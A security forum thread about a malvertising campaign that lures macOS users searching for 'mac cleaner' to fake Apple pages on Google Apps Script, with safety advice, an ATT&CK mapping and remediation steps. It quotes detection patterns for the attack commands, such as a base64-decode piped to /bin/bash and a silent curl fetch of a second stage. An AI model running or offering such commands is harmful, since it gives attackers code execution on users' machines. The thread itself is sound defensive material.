Fake “Mac Cleaner” Campaign Uses Google Ads to Redirect Users to Malware

[Brownie2019]

Content source

https://gbhackers.com/fake-mac-cleaner/

Cybercriminals are exploiting Google Search Ads to distribute malware through deceptive landing pages that impersonate Apple’s official website design.
The malicious ads appear prominently in Google Search results when users search for “mac cleaner,” displaying trusted domains such as docs.google.com and business.google.com as landing pages.
However, clicking these ads redirects users to Google Apps Script macros pages disguised with Apple’s official branding, complete with replica navigation menus and interface elements.
Security researchers have identified a sophisticated campaign targeting macOS users who are searching for disk cleanup utilities, with ads redirecting victims to malicious Google Apps Script pages that host remote code execution payloads.
The pages contain deceptive instructions promising to help users check storage or free up disk space on their machines common maintenance tasks that lull users into a false sense of security.

Full Story:

Fake “Mac Cleaner” Campaign Uses Google Ads to Redirect Users to Malware

Cybercriminals are exploiting Google Search Ads to distribute malware through deceptive landing pages that impersonate Apple's official website design.

gbhackers.com

 

[Bot]

Full Story:

Fake “Mac Cleaner” Campaign Uses Google Ads to Redirect Users to Malware

Cybercriminals are exploiting Google Search Ads to distribute malware through deceptive landing pages that impersonate Apple's official website design.

gbhackers.com

This is a good example of “malvertising” (malicious sponsored ads) combined with “living off trusted infrastructure” (using Google-owned domains like docs.google.com / business.google.com / script.google.com to look legitimate).

What the campaign is doing (high level)

• Sponsored Google Search results for terms like “mac cleaner” can appear to point to trusted Google domains, then redirect to a Google Apps Script page that visually imitates Apple Support pages. ([mackeeper.com](https://mackeeper.com/blog/suspicious-ads-on-google-which-contain-harmful-content-for-mac-users/))
• The fake “Apple-like” page tries to socially engineer the user into opening Terminal and pasting commands that decode/download and execute a remote script (e.g., Base64 + curl | shell style behavior). That’s effectively “run attacker code on your Mac as you.” ([mackeeper.com](https://mackeeper.com/blog/suspicious-ads-on-google-which-contain-harmful-content-for-mac-users/))

Why it works so well

• The ad can show a “clean” looking display URL, and the first hop may be a legitimate Google domain, lowering suspicion. ([mackeeper.com](https://mackeeper.com/blog/suspicious-ads-on-google-which-contain-harmful-content-for-mac-users/))
• The page looks like Apple, and the instructions are framed as normal maintenance (“clean storage”, “install packages”), which reduces user caution. ([mackeeper.com](https://mackeeper.com/blog/suspicious-ads-on-google-which-contain-harmful-content-for-mac-users/))
• Obfuscation (Base64, scrambled command segments) makes it harder for users (and sometimes security tools) to quickly recognize what’s happening. ([mackeeper.com](https://mackeeper.com/blog/suspicious-ads-on-google-which-contain-harmful-content-for-mac-users/))

Practical safety guidance for members

• Treat sponsored results as “untrusted” by default, especially for software/utilities.
• Never copy/paste Terminal commands from a web page you reached via an ad (or any page you didn’t deliberately navigate to and verify).
• If something claims to be Apple Support, verify you are actually on an Apple domain (AppleInsider notes real Apple Support pages should be on support.apple.com, not script.google.com). ([appleinsider.com](https://appleinsider.com/articles/26/01/28/mac-malware-is-sneaking-into-some-sponsored-google-ads))
• Use macOS built-in storage management and only obtain utilities from reputable vendors / official channels (e.g., Mac App Store) rather than “random cleaner” searches.

If someone already clicked the ad and followed instructions
If a user actually pasted/executed the Terminal command(s), assume compromise is possible until proven otherwise.

Recommended next steps (low-risk first):

• Disconnect from the network (to stop any ongoing remote activity).
• Run a full scan with a reputable macOS security product and remove anything it detects (false positives are possible, but don’t ignore detections without validation).
• Check for persistence items (new Login Items, LaunchAgents/LaunchDaemons, suspicious Profiles/MDM, unknown browser extensions).
• Change passwords (starting with email + Apple ID + financial accounts) from a known-clean device, especially if the Mac was used for password managers or SSH keys.
• If this happened to you, it’s best to open a help topic in the Malware Removal / macOS help area and include exactly what was run and what was downloaded (do not re-run the commands).

Sources

• Fake “Mac Cleaner” Campaign Uses Google Ads to Redirect Users to Malware
• BEWARE! Suspicious ads appeared in Google search results which contain harmful content for Mac users
• Mac malware is sneaking into some sponsored Google ads
• Do Not Google These 2 Words—New Warning For Millions Of Apple Users

 

[Halp2001]

Funny how malware doesn’t hide in shady corners anymore, but shows up wearing a suit in Google ads. The trick isn’t even technical—it’s trust. People see a familiar domain, a page that looks like Apple, and that’s enough to lower their guard.
What’s unsettling is that they don’t need to break into your system; they just need you to run the command yourself. It’s not the hacker sneaking in through the window—it’s you opening the front door.
Maybe that’s the real takeaway: the danger isn’t in the strange or exotic, it’s in the everyday. And that’s scarier than any virus with a fancy name.

 

[Divergent]

MITRE ATT&CK Mapping

T1583.001
(Acquire Infrastructure)
Abuse of legitimate, compromised Google Ads accounts.

T1566.002
(Phishing: Spearphishing Link)
Malicious ads appearing as top search results.

T1059.004
(Command and Scripting Interpreter: Unix Shell)
Execution of obscure shell commands.

T1027
(Obfuscated Files or Information)
Use of base64 encoding to hide the payload.

The Kill Chain

Initial Access
User searches for macOS maintenance tools. A "Sponsored" Google Ad appears, seemingly from a trusted entity.

Redirection
Clicking the ad redirects the user to a Google Apps Script macro page. This domain (script[.]google[.]com) is trusted by default in many security appliances, evading reputation-based filtering.

Social Engineering
The landing page simulates an Apple system check. It displays a fake progress bar and instructs the user to "Run this command to clean storage."

Execution
The user copies and pastes a terminal command.

Live Evidence & Anchors (IOCs)
The following string literals were extracted directly from the campaign analysis and can be used for detection.

Social Engineering Strings

"Cleaning macOS Storage..."

"Installing packages please wait..."

Compromised Ad Identities (Identities used to serve ads)

"Nathaniel Josue Rodriguez"

"Aloha Shirt Shop"

Payload Construction (Pattern)

echo '...' | base64 -D | /bin/bash (Decodes and pipes directly to shell)

curl [-]fsSL (Silent fetch of stage-two payload)

Remediation - THE ENTERPRISE TRACK (SANS PICERL)

Phase 1

Identification & Containment

Query SIEM
Search for process execution events where Terminal.app spawns bash or zsh with base64 -D or base64 -d arguments.

Network Block
Temporarily block or scrutinize traffic to script[.]google[.]com if not business-critical, or inspect referrer headers for Google Ad click IDs (gclid).

Identity Check
Review logs for the compromised ad account names ("Nathaniel Josue Rodriguez") if ad data is ingested.

Phase 2

Eradication

Kill Chain Break
Terminate any active curl or python processes spawned from the terminal commands identified above.

Persistence Removal
Check LaunchAgents and LaunchDaemons (~/Library/LaunchAgents/) for recently created plists referencing the downloaded script.

Phase 3

Recovery

Credential Rotation
If the script was executed, assume all browser-stored passwords and SSH keys are compromised. Reset immediately.

Reimaging
Due to the potential for root-level persistence, reimaging the affected macOS device is the only guaranteed removal method.

Phase 4

Lessons Learned

Policy
Implement "Block" policies for Uncategorized and Newly Registered Domains (NRDs).

Training
Specifically train macOS users that no legitimate software requires pasting obscure code into the Terminal for installation.

Remediation - THE HOME USER TRACK

Priority 1

Safety
(Stop & Disconnect)
If you ran the command, disconnect from the internet immediately. The malware needs a connection to send your data to the attacker.

Do not type your password into any pop-up boxes that appear shortly after running the command.

Priority 2

Cleanup
Check for Malware: Download a reputable tool like Malwarebytes for Mac (on a different, clean device, then transfer via USB) to scan your system.

Browser Cleanup
Go to Safari/Chrome settings and clear all website data/cache to remove the malicious ad tracking.

Priority 3

Identity Hygiene
Change your passwords for Email, Banking, and Crypto exchanges from a different device (like your phone).

Enable 2-Factor Authentication (2FA) on all accounts if you haven't already.

Hardening & References

Baseline
Enable macOS Gatekeeper and set it to "App Store and identified developers."

Prevention
Install a browser-based ad blocker (e.g., uBlock Origin) to prevent malicious ads from loading in search results.

Reference
[NIST SP 800-83 Rev. 1] Guide to Malware Incident Prevention and Handling.

Sources

GBHackers Security News

MacKeeper Security Blog

AppleInsider